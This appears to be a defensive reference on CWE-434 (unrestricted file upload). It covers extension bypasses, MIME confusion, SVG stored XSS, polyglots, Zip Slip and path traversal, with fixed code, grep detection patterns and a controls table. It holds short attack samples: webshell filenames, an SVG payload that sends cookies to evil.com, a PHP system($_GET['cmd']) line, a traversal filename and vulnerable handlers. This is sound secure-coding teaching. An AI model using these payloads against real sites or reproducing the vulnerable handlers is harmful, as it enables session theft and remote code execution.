CWE-434: Unrestricted Upload of Dangerous File Type
CWE Top 25 Rank: 10 (2024).
Impact range: RCE (uploaded PHP/JSP shell), stored XSS (uploaded SVG/HTML), path traversal (overwriting config files), DoS (ZIP bombs, scripts that loop forever).
Core issue: the server accepts and stores files that the server or its clients will later execute or render in a privileged context.
Functional Semantics
The vulnerability manifests in two distinct execution contexts:
- Server-side execution: uploaded file is placed in a directory served by an application runtime (PHP, Python, Node.js, JSP/Servlet), allowing the attacker to request the file and have the server execute it.
- Client-side execution: uploaded file is served to other users with a MIME type that causes the browser to execute it (SVG with embedded JS, HTML files, XML with XSLT).
Secondary impact without execution: path traversal in filename allows overwriting arbitrary files on the server; ZIP/archive bombs cause resource exhaustion.
Extension Bypass Techniques
Double extension
shell.php.jpg # Apache with misconfigured AddHandler will execute as PHP
shell.php%00.jpg # Null byte truncation in older PHP: stored as shell.php
shell.pHp # Case-sensitive extension check, but the server or file system maps extensions case-insensitively
shell.php5 # Alternative PHP extension not in blocklist
shell.phtml # Another PHP alternative extension
shell.shtml # Apache SSI - Server Side Includes execution
Incomplete blocklists (common mistakes):
import os
import pathlib
# VULNERABLE: blocklist approach, incomplete
BLOCKED_EXTENSIONS = {'.php', '.asp', '.aspx', '.py', '.rb'}
def validate_upload(filename):
    ext = os.path.splitext(filename)[1].lower()
    if ext in BLOCKED_EXTENSIONS:
        raise ValueError("Dangerous file type")
    # Misses: .php5, .phtml, .shtml, .cgi, .pl, .jsp, .jspx, .cfm, etc.
# FIXED: allowlist approach - only permit explicitly safe types
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.webp', '.pdf', '.mp4'}
def validate_upload(filename):
    # suffix returns only the final extension ('shell.php.jpg' -> '.jpg'),
    # so also store the file under a server-generated name
    ext = pathlib.Path(filename).suffix.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"File type not permitted: {ext}")
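The allowlist check looks only at the last suffix, so a double-extension name such as shell.php.jpg still passes it. The following is a minimal sketch of a stricter policy, assuming it is acceptable to reject any name whose dot-separated suffixes are not all allowlisted. The helper name `validate_all_suffixes` is hypothetical and not part of the original text.

```python
import pathlib

ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.webp', '.pdf', '.mp4'}

def validate_all_suffixes(filename: str) -> str:
    """Return the final extension if every dot-suffix is allowlisted.

    Hypothetical helper: a strict policy that also rejects harmless names
    such as 'report.final.pdf'.
    """
    # PureWindowsPath treats both '/' and '\\' as separators, so directory
    # components are dropped whatever platform the client used.
    name = pathlib.PureWindowsPath(filename).name
    suffixes = [s.lower() for s in pathlib.PurePosixPath(name).suffixes]
    if not suffixes:
        raise ValueError("File has no extension")
    for ext in suffixes:
        if ext not in ALLOWED_EXTENSIONS:
            raise ValueError(f"File type not permitted: {ext}")
    return suffixes[-1]
```

The trade-off is deliberate: legitimate names with extra dots are rejected, which matters less when the stored name is generated server-side anyway.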
Null byte injection (legacy PHP/older systems)
# HTTP multipart body:
Content-Disposition: form-data; name="file"; filename="shell.php%00.jpg"
# PHP < 5.3.4: null byte truncates the string → stored as shell.php
# Modern PHP: fixed, but may exist in custom C extensions
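Even on runtimes where truncation is fixed, a NUL byte in a filename is never legitimate, so it can simply be rejected up front. This is a minimal sketch, assuming the filename may arrive either raw or percent-encoded and that one decoding pass is enough. The function name `reject_control_chars` is hypothetical.

```python
from urllib.parse import unquote

def reject_control_chars(filename: str) -> str:
    """Raise ValueError if the name holds NUL or other control characters.

    Checks both the raw value and one percent-decoded pass; repeated
    encoding (e.g. %2500) is not unwrapped here.
    """
    decoded = unquote(filename)
    for candidate in (filename, decoded):
        if any(ord(ch) < 32 or ord(ch) == 127 for ch in candidate):
            raise ValueError("Control character in filename")
    return filename
```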
Archive extraction path traversal (Zip Slip)
# VULNERABLE: extracting an archive without path validation
import zipfile
def extract_upload(zip_path, dest_dir):
    with zipfile.ZipFile(zip_path) as zf:
        zf.extractall(dest_dir)  # archive may contain ../../etc/cron.d/evil
        # CPython's zipfile strips ".." components itself; tarfile without an
        # extraction filter and many other libraries do not
# FIXED: validate each member path stays within dest_dir
import zipfile, pathlib
def safe_extract(zip_path, dest_dir):
    dest = pathlib.Path(dest_dir).resolve()
    with zipfile.ZipFile(zip_path) as zf:
        for member in zf.namelist():
            member_path = (dest / member).resolve()
            # Compare path components, not string prefixes:
            # '/data/up_evil'.startswith('/data/up') is True
            if member_path != dest and dest not in member_path.parents:
                raise ValueError(f"Path traversal attempt: {member}")
            zf.extract(member, dest_dir)
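Path validation does not address the archive-bomb case mentioned earlier. The sketch below inspects the sizes declared in the archive's central directory before anything is extracted. The function name `check_archive_limits` and the default limits are assumptions for illustration. Declared sizes can be forged, so a byte cap during extraction is still worth enforcing.

```python
import io
import zipfile

def check_archive_limits(zip_file, max_entries=1000,
                         max_total_bytes=100 * 1024 * 1024, max_ratio=100):
    """Raise ValueError if declared archive contents exceed the limits.

    Returns the total declared uncompressed size in bytes.
    """
    with zipfile.ZipFile(zip_file) as zf:
        infos = zf.infolist()
        if len(infos) > max_entries:
            raise ValueError(f"Too many entries: {len(infos)}")
        total = 0
        for info in infos:
            total += info.file_size
            if total > max_total_bytes:
                raise ValueError("Declared uncompressed size exceeds limit")
            if info.compress_size > 0 and info.file_size / info.compress_size > max_ratio:
                raise ValueError(f"Suspicious compression ratio: {info.filename}")
    return total

# Demo: 10 MB of zero bytes deflates to a few kilobytes, far above 100:1.
bomb = io.BytesIO()
with zipfile.ZipFile(bomb, 'w', zipfile.ZIP_DEFLATED) as zf:
    zf.writestr('zeros.bin', b'\0' * (10 * 1024 * 1024))
try:
    check_archive_limits(bomb)
except ValueError as exc:
    print(f"rejected: {exc}")
```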
MIME Type Confusion
Client-supplied Content-Type (never trust)
# VULNERABLE: trusting browser-provided Content-Type
def handle_upload(request):
    content_type = request.FILES['file'].content_type  # from HTTP header, attacker-controlled
    if content_type.startswith('image/'):
        save_file(request.FILES['file'])  # attacker sends PHP shell with Content-Type: image/jpeg
# FIXED: detect MIME from file content (magic bytes), not headers
import magic  # python-magic library
ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}  # example allowlist
def handle_upload(request):
    uploaded = request.FILES['file']
    file_bytes = uploaded.read(2048)  # the header bytes are enough for detection
    uploaded.seek(0)                  # rewind so save_file sees the whole file
    detected_mime = magic.from_buffer(file_bytes, mime=True)
    if detected_mime not in ALLOWED_MIME_TYPES:
        raise ValueError(f"Detected type {detected_mime} not allowed")
    save_file(uploaded)  # save_file is the application's own storage routine
Magic bytes for common types:
| Type | First bytes |
|---|---|
| JPEG | FF D8 FF |
| PNG | 89 50 4E 47 0D 0A 1A 0A |
| GIF | 47 49 46 38 (GIF8) |
| PDF | 25 50 44 46 (%PDF) |
| ZIP | 50 4B 03 04 |
| PHP | 3C 3F 70 68 (<?ph) - always reject this magic in image uploads |
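Where python-magic is unavailable, the signatures in the table can be checked directly. This is a rough sketch using only those table entries. The names `MAGIC_SIGNATURES` and `sniff_type` are hypothetical, and a real deployment would need a far larger signature set.

```python
# Signatures taken from the table above; not an exhaustive list.
MAGIC_SIGNATURES = [
    (b'\xff\xd8\xff', 'image/jpeg'),
    (b'\x89PNG\r\n\x1a\n', 'image/png'),
    (b'GIF8', 'image/gif'),
    (b'%PDF', 'application/pdf'),
    (b'PK\x03\x04', 'application/zip'),
]
SCRIPT_PREFIXES = (b'<?ph',)  # PHP opening tag, rejected outright

def sniff_type(head: bytes):
    """Return the MIME type matching the leading bytes, or None if unknown."""
    if head.startswith(SCRIPT_PREFIXES):
        raise ValueError("Script signature at start of file")
    for signature, mime in MAGIC_SIGNATURES:
        if head.startswith(signature):
            return mime
    return None
```

A matching signature only says how the file begins; it does not rule out a polyglot, so this check complements re-encoding and does not replace it.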
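SVG with Embedded JavaScript (Stored XSS)
SVG is XML and can contain <script> tags. When a browser loads an SVG served as image/svg+xml as a document (direct navigation, <iframe>, <object>, or <embed>), it executes the JavaScript in the origin that served the file. SVGs referenced through <img> do not run scripts.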
<!-- ATTACK: uploaded as avatar.svg -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>
// Executes in the origin of the site serving this SVG
document.cookie // accessible
fetch('https://evil.com/steal?c=' + document.cookie)
</script>
<rect width="100" height="100"/>
</svg>
Fix options:
# Option 1: reject SVG entirely if user-generated content
ALLOWED_IMAGE_TYPES = {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}
# image/svg+xml NOT in this set
# Option 2: if SVG needed, sanitize on the server (bleach in Python, DOMPurify in JavaScript)
# Note: bleach is an HTML sanitizer rather than an SVG-aware one; treat this as a starting point
import bleach
def sanitize_svg(svg_content: str) -> str:
    # Allow structural SVG tags, disallow script/foreignObject/use href tricks
    allowed_tags = {'svg', 'path', 'circle', 'rect', 'line', 'g', 'text', 'defs'}
    # bleach expects a list, dict, or callable for attributes (a set is rejected)
    allowed_attrs = ['viewBox', 'width', 'height', 'd', 'fill', 'stroke', 'cx', 'cy', 'r']
    return bleach.clean(svg_content, tags=allowed_tags, attributes=allowed_attrs, strip=True)
# Option 3: serve SVG with Content-Disposition: attachment (no execution in browser)
# and Content-Type: application/octet-stream
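Option 3 comes down to the response headers sent with the file. A minimal, framework-neutral sketch of those headers follows, assuming the stored name was generated server-side. The function name `download_headers` is hypothetical, and the X-Content-Type-Options header is an addition not mentioned above.

```python
def download_headers(stored_name: str) -> dict:
    """Build headers that make the browser download instead of render."""
    # Refuse characters that could break out of the quoted filename
    # or inject extra header lines.
    if not stored_name or any(ch in stored_name for ch in '"\\/\r\n'):
        raise ValueError("Unsafe stored name")
    return {
        'Content-Type': 'application/octet-stream',
        'Content-Disposition': f'attachment; filename="{stored_name}"',
        # Assumption beyond the text above: also disable MIME sniffing.
        'X-Content-Type-Options': 'nosniff',
    }
```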
Polyglot Files
A file that is simultaneously valid in two formats. Example: a valid JPEG that is also a valid PHP script.
# JPEG header
FF D8 FF E0 ... [valid JPEG data]
# After JPEG data, PHP code appended (JPEG parser ignores trailing data)
<?php system($_GET['cmd']); ?>
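The JPEG renders correctly in an image viewer. If the file is later passed to PHP's include or require (for example through a local file inclusion bug), or the server is misconfigured to run it through the PHP handler, the interpreter executes the embedded code.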
Defense: Image reprocessing (re-encode all uploaded images):
from PIL import Image
import io
def sanitize_image_upload(file_bytes: bytes) -> bytes:
    """Re-encode image to strip appended code and EXIF payloads."""
    img = Image.open(io.BytesIO(file_bytes))
    img.verify()  # raises if not a valid image
    # Re-open: the image object cannot be used again after verify()
    img = Image.open(io.BytesIO(file_bytes))
    output = io.BytesIO()
    # Re-encode: strips EXIF, appended PHP, embedded JS in metadata
    img.save(output, format=img.format or 'JPEG', exif=b'')
    return output.getvalue()
Path Traversal in Filename
# VULNERABLE: using user-supplied filename directly
import os
def save_upload(filename, data):
    path = os.path.join('/var/uploads', filename)
    # filename = '../../etc/cron.d/evil' → writes to /etc/cron.d/evil
    with open(path, 'wb') as f:
        f.write(data)
# FIXED: use only the basename, generate server-side name
import uuid, pathlib
def save_upload(filename: str, data: bytes) -> str:
    # Extract only the base filename, discard any directory components
    safe_name = pathlib.Path(filename).name  # strips ../../ prefixes
    ext = pathlib.Path(safe_name).suffix.lower()  # should already have passed the allowlist
    # Better: generate a new UUID-based name entirely (avoids name conflicts + traversal)
    stored_name = f"{uuid.uuid4()}{ext}"
    upload_root = pathlib.Path('/var/uploads').resolve()
    dest = (upload_root / stored_name).resolve()
    # Paranoid check: compare path components; a string prefix test
    # would also accept /var/uploads_old
    if upload_root not in dest.parents:
        raise ValueError("Path traversal detected")
    dest.write_bytes(data)
    return stored_name
Upload to Webroot / Execution Context
A file that would be safe as a download becomes dangerous when placed in a directory served by the application runtime.
# VULNERABLE nginx + php-fpm config
location /uploads/ {
    # Files served from here
}
location ~ \.php$ {
    fastcgi_pass php-fpm;
    # If upload dir overlaps with PHP-served dir, uploaded .php files execute
}
# FIXED: explicitly disable execution in uploads directory
location /uploads/ {
    add_header Content-Disposition "attachment";
    location ~ \.(php|phtml|php5|shtml|cgi|pl|jsp)$ {
        deny all; # block execution even if misconfigured
    }
}
Principle: uploaded files must never be stored inside or below the application's code/template root. Serve from a separate origin (static.example.com) or object storage (S3, GCS) with no execution capability.
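The principle can be enforced as a startup check. This is a minimal sketch, assuming POSIX paths and that both directories are known at configuration time. The helper names `is_within` and `assert_uploads_outside_code` are hypothetical.

```python
import os

def is_within(root: str, candidate: str) -> bool:
    """True if candidate is root itself or lies somewhere below it."""
    root_real = os.path.realpath(root)            # resolves symlinks and '..'
    candidate_real = os.path.realpath(candidate)
    # commonpath compares whole components, so /srv/app_uploads is not
    # mistaken for a child of /srv/app.
    return os.path.commonpath([root_real, candidate_real]) == root_real

def assert_uploads_outside_code(upload_dir: str, code_root: str) -> None:
    """Refuse to start if uploads would land inside the code/template root."""
    if is_within(code_root, upload_dir):
        raise RuntimeError(f"{upload_dir} is inside code root {code_root}")
```

Calling `assert_uploads_outside_code` once at application start turns a silent misconfiguration into an immediate failure.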
Affected Ecosystems
| Ecosystem | Specific risks | Notes |
|---|---|---|
| PHP | .php, .phtml, .php5 execution | Most critical; PHP includes from file path are RCE |
| Python/Django | Indirect (no direct file execution); SVG XSS | Static files served differently; Django doesn't exec uploads |
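| Java/JSP | .jsp, .jspx execution if in webapp root | Files under WEB-INF/ are not served directly, but overwriting web.xml or classes there can still lead to code execution; storing uploads outside the webapp root avoids both |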
| Node.js | No file execution from disk by default; require() injection possible | SVG XSS via res.sendFile with wrong Content-Type |
| Ruby on Rails | CarrierWave/Paperclip misconfigs; SVG XSS | Content-Type from filename extension: check for .svg |
| ASP.NET | .aspx, .ashx execution if in IIS-served dir | IIS serves .aspx from anywhere in webroot |
| Go | No built-in file execution; SVG XSS via http.ServeFile | Custom exec via os/exec with uploaded filename possible |
Detection Heuristics
- Find file upload handlers: search for multipart/form-data, request.FILES, UploadedFile, MultipartFile, IFormFile, upload.single().
- For each handler, check: is there an extension allowlist (not blocklist)? Is there MIME validation using magic bytes (not the Content-Type header)?
- Check where uploaded files are stored: is the path inside the webroot? Is the directory served with execute permissions?
- Check if the stored filename derives from user input: the filename field in Content-Disposition. Any path component from user input without basename() is path traversal.
- For image uploads: is there image reprocessing (Pillow, ImageMagick convert)? No reprocessing = polyglot / metadata payload risk.
- Check the served Content-Type: are uploaded files served with the correct type, or does the server guess from the extension?
# Grep patterns
grep -rn "request.FILES\|multipart\|upload" --include="*.py" -l
grep -rn "\.filename\|getOriginalFilename\|getClientFilename" --include="*.java" -l
grep -rn "req\.file\|multer\|busboy" --include="*.js" -l
grep -rn "IFormFile\|HttpPostedFileBase" --include="*.cs" -l
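Where grep is unavailable, or the hits need to feed another tool, the same search can be sketched in Python. The patterns mirror the grep expressions above. The names `PATTERNS`, `scan_text`, and `scan_tree` are hypothetical.

```python
import re
from pathlib import Path

# One pattern per file extension, mirroring the grep commands.
PATTERNS = {
    '.py': re.compile(r'request\.FILES|multipart|upload'),
    '.java': re.compile(r'\.filename|getOriginalFilename|getClientFilename'),
    '.js': re.compile(r'req\.file|multer|busboy'),
    '.cs': re.compile(r'IFormFile|HttpPostedFileBase'),
}

def scan_text(path: str, text: str) -> list:
    """Return (path, line_number, line) for every line matching the pattern."""
    pattern = PATTERNS.get(Path(path).suffix)
    if pattern is None:
        return []
    return [(path, number, line.strip())
            for number, line in enumerate(text.splitlines(), 1)
            if pattern.search(line)]

def scan_tree(root: str) -> list:
    """Walk a source tree and collect candidate upload handlers."""
    hits = []
    for file_path in Path(root).rglob('*'):
        if file_path.is_file() and file_path.suffix in PATTERNS:
            hits.extend(scan_text(str(file_path),
                                  file_path.read_text(errors='ignore')))
    return hits
```

Each hit is only a candidate; the checks in the list above still have to be applied to every handler by hand.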
Fixing Patterns
| Control | Implementation |
|---|---|
| Extension allowlist | ALLOWED_EXT = {'.jpg', '.png', '.pdf'}; if ext not in ALLOWED_EXT: reject |
| MIME from magic bytes | python-magic, file-type (npm), net/http.DetectContentType (Go) |
| Store outside webroot | Upload to /var/uploads/ (not in /var/www/) or object storage |
| Separate static origin | Serve user uploads from uploads.example.com - different origin prevents cookie theft |
| UUID filenames | stored_as = str(uuid4()) + ext - prevents path traversal and name guessing |
| Image reprocessing | PIL.Image.open() → img.save() strips appended code and EXIF |
| Content-Disposition header | Content-Disposition: attachment forces download instead of render |
| Antivirus scanning | ClamAV on uploaded files - catches known malware, not custom shells |
| File size limit | MAX_UPLOAD_SIZE = 10 * 1024 * 1024 caps the upload itself; for archives, also cap decompressed size and entry count to stop ZIP bombs |
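The size limit is most reliable when enforced while reading, since a declared Content-Length can be wrong or missing. This is a minimal sketch, assuming the upload is exposed as a file-like object with a `read()` method. The name `read_limited` is hypothetical.

```python
import io

MAX_UPLOAD_SIZE = 10 * 1024 * 1024

def read_limited(stream, max_bytes: int = MAX_UPLOAD_SIZE,
                 chunk_size: int = 64 * 1024) -> bytes:
    """Read the stream in chunks, aborting once max_bytes is exceeded."""
    chunks = []
    total = 0
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        total += len(chunk)
        if total > max_bytes:
            raise ValueError(f"Upload exceeds {max_bytes} bytes")
        chunks.append(chunk)
    return b''.join(chunks)

# Example: a 3-byte stream under an 8-byte cap is returned whole.
demo = read_limited(io.BytesIO(b'abc'), max_bytes=8)
```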
Gotchas - False Positive Indicators
- Admin-only upload endpoints with no external user access: lower risk profile, but still exploitable after an admin account compromise; not a zero-risk finding.
- Upload to object storage (S3/GCS): stored objects cannot be executed server-side, but SVG XSS remains possible if files are served directly from the bucket without Content-Disposition: attachment.
- Content-Type: image/jpeg validation based on the header sent by the browser: not a fix, because the value is client-supplied. The check only counts if the type is detected from the content, for example with magic.from_buffer().
- os.path.basename() on Windows paths on Linux: os.path.basename('C:\\..\\evil.php') on Linux returns the whole string, C:\..\evil.php, not just the filename. pathlib.Path(filename).name behaves the same way on Linux; use pathlib.PureWindowsPath(filename).name, which treats both / and \ as separators.
- Image libraries that tolerate corrupted headers: PIL Image.open() raises on truly invalid files but accepts many polyglots. img.verify() + re-open + re-save is the reliable pattern.
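The basename gotcha is easy to check with the platform-independent path modules. The sketch below contrasts POSIX and Windows parsing of the same client-supplied name. The helper name `client_basename` is hypothetical.

```python
import posixpath
from pathlib import PurePosixPath, PureWindowsPath

def client_basename(filename: str) -> str:
    """Return the last path component, splitting on both '/' and '\\'."""
    name = PureWindowsPath(filename).name
    if name in ('', '.', '..'):
        raise ValueError("No usable filename")
    return name

windows_style = 'C:\\..\\evil.php'
# POSIX rules see no separator at all, so the whole string comes back.
posix_result = posixpath.basename(windows_style)
pathlib_posix_result = PurePosixPath(windows_style).name
# Windows rules split on the backslashes and keep only the last component.
safe_result = client_basename(windows_style)
```

Using the pure path classes keeps the behaviour identical on every host OS, which `os.path` and `pathlib.Path` do not guarantee.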
See Also
- CWE-22: Path Traversal - path traversal in filename component
- CWE-79: XSS - consequence via SVG/HTML upload
- CWE-352: CSRF - often combined with file upload to force victim's upload
- CWE-732: Insecure Permissions - upload dir permissions enabling execution
- web application security fundamentals - broader web security context